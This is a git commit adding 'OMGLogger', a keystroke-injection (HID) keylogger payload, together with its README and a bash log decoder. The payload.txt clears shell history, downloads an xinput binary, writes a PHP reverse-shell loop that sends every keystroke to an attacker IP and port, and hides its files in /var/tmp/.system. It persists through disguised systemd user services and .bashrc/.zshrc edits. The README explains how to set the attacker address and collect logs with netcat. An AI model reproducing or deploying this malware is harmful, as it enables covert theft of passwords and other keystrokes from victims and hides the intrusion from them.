Merge pull request #49 from drapl0n/patch-3

Uploading OMGLogger
2022-05-18 10:59:29 -05:00 · 2022-05-18 10:59:29 -05:00 · e6b616011b
parent 133c7bd5ed 60112142d6
commit e6b616011b
3 changed files with 194 additions and 0 deletions
--- a/payloads/library/credentials/OMGLogger/OMGLoggerDecoder
+++ b/payloads/library/credentials/OMGLogger/OMGLoggerDecoder
@ -0,0 +1,51 @@
+#!/bin/bash
+usage () { 
+	echo -e "OMGLoggerDecoder is used to decode raw key strokes acquired by OMGLogger.\n"
+	echo -e "Usage: \nDecode captured log:\t[./OMGLoggerDecoder -f <Logfile> -m <mode> -o <output file>]"; 
+	echo -e "\nOptions:"
+	echo -e "-f\tSpecify Log file."
+	echo -e "-m\tSelect Mode(normal|informative)"
+	echo -e "-o\tSpecify Output file."
+	echo -e "-h\tFor this banner."
+}
+while getopts o:m:f:h: flag
+do
+    case "${flag}" in
+        o) output=$OPTARG ;;
+        m) mode=$OPTARG ;;
+	f) filename=$OPTARG ;;
+	h) help=$OPTARG ;;
+	*)
+			usage
+                        exit 1
+    esac
+done
+
+if [ -z "$output" ] && [ -z "$filename" ]; then
+	usage
+        exit 1
+fi
+if [ -z "$filename" ]; then
+        echo -e "OMGLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
+	exit 1
+fi
+if [ -z "$output" ]; then
+        echo -e "OMGLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
+	exit 1
+fi
+if [ -z "$mode" ]; then
+        echo -e "OMGLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
+        exit 1
+fi
+if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
+        echo -e "DuckyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
+        exit 1
+fi
+if [ "$mode" == "normal" ] ; then
+        awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
+        exit 1
+fi
+if [ "$mode" == "informative" ] ; then
+        awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
+        exit 1
+fi
--- a/payloads/library/credentials/OMGLogger/README.md
+++ b/payloads/library/credentials/OMGLogger/README.md
@ -0,0 +1,50 @@
+## About:
+* Title: OMGLogger
+* Description: Key logger which sends each and every key stroke of target remotely/locally.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Credentials
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID
+
+## OMGLogger: OMGLogger is a Key Logger which captures every key stroke of traget and send them to attacker.
+
+### Features:
+* Live keystroke capturing.
+* Detailed key logs.
+* Persistent
+* Autostart payload on boot.
+
+### Workflow:
+* Encoding payload and injecting on target's system.
+* Checks whether internet is connected to the target system. 
+* If internet is connected then it sends raw keystrokes to attacker. 
+* Attacker processes raw keystrokes. 
+
+### Changes to be made in payload:
+* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `43`.
+* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `59`.
+
+### Usage:
+1. Encode payload.txt and inject into target's system.
+2. Start netcat listner on attacking system:
+
+* `nc -lvp <port number> > <log filename>` use this command to create new logfile with raw keystrokes.
+* `nc -lvp <port number> >> <log filename>` use this command to append raw keystrokes to existing logfile.
+3. Process raw keystrokes using OMGLoggerDecoder utility:
+```
+./OMGLoggerDecoder
+OMGLoggerDecoder is used to decode raw key strokes acquired by OMGLogger.
+
+Usage: 
+Decode captured log:    [./OMGLoggerDecoder -f <Logfile> -m <mode> -o <output file>]
+
+Options:
+-f      Specify Log file.
+-m      Select Mode(normal|informative)
+-o      Specify Output file.
+-h      For this banner.
+```
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
--- a/payloads/library/credentials/OMGLogger/payload.txt
+++ b/payloads/library/credentials/OMGLogger/payload.txt
@ -0,0 +1,93 @@
+REM Title: DuckyLogger
+REM Description: Key logger which sends each and every key stroke of target remotely/locally.
+REM AUTHOR: drapl0n
+REM Version: 1.0
+REM Category: Credentials
+REM Target: Unix-like operating systems with systemd
+REM Attackmodes: HID
+
+REM [Note]
+REM Visit https://github.com/drapl0n/DuckyLogger/README.md for usage and other important instructions.
+
+REM [keeping tracks clear]
+DELAY 5000
+CTRL ALT t
+DELAY 400
+STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+ENTER
+DELAY 100
+
+REM [creating key logging mechanism]
+STRING mkdir /var/tmp/.system
+ENTER
+DELAY 100
+STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys 
+ENTER
+DELAY 100
+STRING chmod +x /var/tmp/.system/sys
+ENTER
+DELAY 100
+
+REM [importing xinput]
+STRING cd /var/tmp/.system/
+ENTER
+DELAY 100
+STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
+ENTER
+DELAY 5000
+STRING chmod +x xinput
+ENTER
+DELAY 100
+
+REM [creating reverse shell]
+STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" >  /var/tmp/.system/systemBus
+ENTER
+DELAY 100
+STRING chmod +x /var/tmp/.system/systemBus
+ENTER
+DELAY 100
+
+REM [creating systemd service to execute payload on boot]
+STRING mkdir -p ~/.config/systemd/user
+ENTER
+DELAY 200
+STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+ENTER
+DELAY 100
+
+REM [creating reboot script incase if listner stops or targets internet connection gets lost] 
+STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
+ENTER
+DELAY 100
+STRING chmod +x /var/tmp/.system/reboot
+ENTER
+DELAY 100
+
+REM [creating systemd service to execute payload on boot]
+STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
+ENTER
+DELAY 100
+
+REM [enabling service]
+STRING systemctl --user daemon-reload
+ENTER
+DELAY 300
+STRING systemctl --user enable --now systemBUS.service
+ENTER
+DELAY 150
+STRING systemctl --user start --now systemBUS.service
+ENTER
+DELAY 150
+STRING systemctl --user enable --now reboot.service
+ENTER
+DELAY 150
+STRING systemctl --user start --now reboot.service
+ENTER
+DELAY 100
+
+REM [autostarting service on terminal/shell launch]
+STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
+ENTER
+DELAY 100
+STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
+ENTER